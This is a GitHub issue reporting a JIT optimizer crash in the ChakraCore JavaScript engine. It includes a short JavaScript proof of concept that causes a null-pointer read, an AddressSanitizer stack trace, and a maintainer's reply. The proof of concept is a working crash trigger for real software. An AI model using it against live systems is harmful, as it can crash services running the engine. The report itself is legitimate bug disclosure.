search

chakra-core / ChakraCore

ChakraCore is an open source Javascript engine with a C API.
MIT License
9.09k stars 1.19k forks source link

SEGV on unknown address 0x000000000000 #6888

Open tjuTangSong opened 1 year ago

tjuTangSong commented 1 year ago

Branch: master Commit: cbb9b101d18e4c1682ca39a52a201d8e4241ea17 POC is:

let xxx = new Uint32Array(0x10000);

xxx.slice = Array.prototype.slice;

function jit(arr, index){
        let ut = arr.slice(0,0);   //become definite Uint32Array but |arr| is a VirtualUint32Array
        for(let i = 0; i < (i + 4); i++){
                arr[i] = 0;   //will be crash at |Op_memset|
        }
}

for(let i = 0;i < 0x10000; i++){
        jit(xxx, 2);
}

if (xxx[0] === 0)
{
    WScript.Echo('pass');
}

In release build ./build.sh --sanitize=address --static -j I get 

AddressSanitizer:DEADLYSIGNAL
=================================================================
==10375==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5654a00b501f bp 0x7f2732ef76b0 sp 0x7f2732ef75a0 T2)
==10375==The signal is caused by a READ memory access.
==10375==Hint: address points to the zero page.
    #0 0x5654a00b501e in BackwardPass::IsEmptyLoopAfterMemOp(Loop*) (/root/ChakraCore-latest/out/Release/ch+0x1dff01e)
    #1 0x5654a005db67 in BackwardPass::Optimize() (/root/ChakraCore-latest/out/Release/ch+0x1da7b67)
    #2 0x56549fbbc9dc in GlobOpt::BackwardPass(Js::Phase) (/root/ChakraCore-latest/out/Release/ch+0x19069dc)
    #3 0x56549fbbd3e1 in GlobOpt::Optimize() (/root/ChakraCore-latest/out/Release/ch+0x19073e1)
    #4 0x56549fba4d16 in Func::TryCodegen() (/root/ChakraCore-latest/out/Release/ch+0x18eed16)
    #5 0x56549fba43c0 in Func::Codegen(Memory::JitArenaAllocator*, JITTimeWorkItem*, ThreadContextInfo*, ScriptContextInfo*, JITOutputIDL*, Js::EntryPointInfo*, FunctionJITRuntimeInfo const*, JITTimePolymorphicInlineCacheInfo*, void*, Js::ScriptContextProfiler*, bool) (/root/ChakraCore-latest/out/Release/ch+0x18ee3c0)
    #6 0x56549fa1fbd8 in NativeCodeGenerator::CodeGen(Memory::PageAllocatorBase<Memory::VirtualAllocWrapper, Memory::SegmentBase<Memory::VirtualAllocWrapper>, Memory::PageSegmentBase<Memory::VirtualAllocWrapper> >*, CodeGenWorkItemIDL*, JITOutputIDL&, bool, Js::EntryPointInfo*) (/root/ChakraCore-latest/out/Release/ch+0x1769bd8)
    #7 0x56549fa20350 in NativeCodeGenerator::CodeGen(Memory::PageAllocatorBase<Memory::VirtualAllocWrapper, Memory::SegmentBase<Memory::VirtualAllocWrapper>, Memory::PageSegmentBase<Memory::VirtualAllocWrapper> >*, CodeGenWorkItem*, bool) (/root/ChakraCore-latest/out/Release/ch+0x176a350)
    #8 0x56549fa21f5d in NativeCodeGenerator::Process(JsUtil::Job*, JsUtil::ParallelThreadData*) (/root/ChakraCore-latest/out/Release/ch+0x176bf5d)
    #9 0x56549fa551a3 in JsUtil::BackgroundJobProcessor::Process(JsUtil::Job*, JsUtil::ParallelThreadData*) (/root/ChakraCore-latest/out/Release/ch+0x179f1a3)
    #10 0x56549fa55500 in JsUtil::BackgroundJobProcessor::Run(JsUtil::ParallelThreadData*) (/root/ChakraCore-latest/out/Release/ch+0x179f500)
    #11 0x56549fa511c1 in JsUtil::BackgroundJobProcessor::StaticThreadProc(void*) (/root/ChakraCore-latest/out/Release/ch+0x179b1c1)
    #12 0x56549e7391e8 in CorUnix::CPalThread::ThreadEntry(void*) (/root/ChakraCore-latest/out/Release/ch+0x4831e8)
    #13 0x56549e63a85e in __asan::AsanThread::ThreadStart(unsigned long, __sanitizer::atomic_uintptr_t*) (/root/ChakraCore-latest/out/Release/ch+0x38485e)
    #14 0x7f2f3978c6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #15 0x7f2f38af361e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12161e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/ChakraCore-latest/out/Release/ch+0x1dff01e) in BackwardPass::IsEmptyLoopAfterMemOp(Loop*)
Thread T2 created by T0 here:
    #0 0x56549e585e00 in pthread_create (/root/ChakraCore-latest/out/Release/ch+0x2cfe00)
    #1 0x56549e738101 in CorUnix::InternalCreateThread(CorUnix::CPalThread*, _SECURITY_ATTRIBUTES*, unsigned int, unsigned int (*)(void*), void*, unsigned int, CorUnix::PalThreadType, unsigned int*, void**) (/root/ChakraCore-latest/out/Release/ch+0x482101)
    #2 0x56549e737aea in CreateThread (/root/ChakraCore-latest/out/Release/ch+0x481aea)
    #3 0x56549fa509ce in JsUtil::BackgroundJobProcessor::InitializeParallelThreadData(AllocationPolicyManager*, bool) (/root/ChakraCore-latest/out/Release/ch+0x179a9ce)
    #4 0x56549fa51ac8 in JsUtil::BackgroundJobProcessor::BackgroundJobProcessor(AllocationPolicyManager*, JsUtil::ThreadService*, bool) (/root/ChakraCore-latest/out/Release/ch+0x179bac8)
    #5 0x56549ea0b911 in ThreadContext::GetJobProcessor() (/root/ChakraCore-latest/out/Release/ch+0x755911)
    #6 0x56549fa1c428 in NativeCodeGenerator::NativeCodeGenerator(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x1766428)
    #7 0x56549fa13ac8 in NewNativeCodeGenerator(Js::ScriptContext*) (/root/ChakraCore-latest/out/Release/ch+0x175dac8)
    #8 0x56549e9c6386 in Js::ScriptContext::Initialize() (/root/ChakraCore-latest/out/Release/ch+0x710386)
    #9 0x56549e84d622 in JsrtContextCore::EnsureScriptContext() (/root/ChakraCore-latest/out/Release/ch+0x597622)
    #10 0x56549e84d335 in JsrtContextCore::New(JsrtRuntime*) (/root/ChakraCore-latest/out/Release/ch+0x597335)
    #11 0x56549e7401bd in CreateContextCore(void*, TTD::TTDJsRTActionResultAutoRecorder&, bool, bool, bool, void**) (/root/ChakraCore-latest/out/Release/ch+0x48a1bd)
    #12 0x56549e743569 in JsCreateContext (/root/ChakraCore-latest/out/Release/ch+0x48d569)
    #13 0x56549e66d2db in ExecuteTest(char const*) (/root/ChakraCore-latest/out/Release/ch+0x3b72db)
    #14 0x56549e66e606 in main (/root/ChakraCore-latest/out/Release/ch+0x3b8606)
    #15 0x7f2f389f3c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)

==10375==ABORTING
ppenzin commented 1 year ago

Thank you for the report, this seems to be a bug. This also leads to a naked segfault without sanitizers on, that's why I am setting severity:1 for now.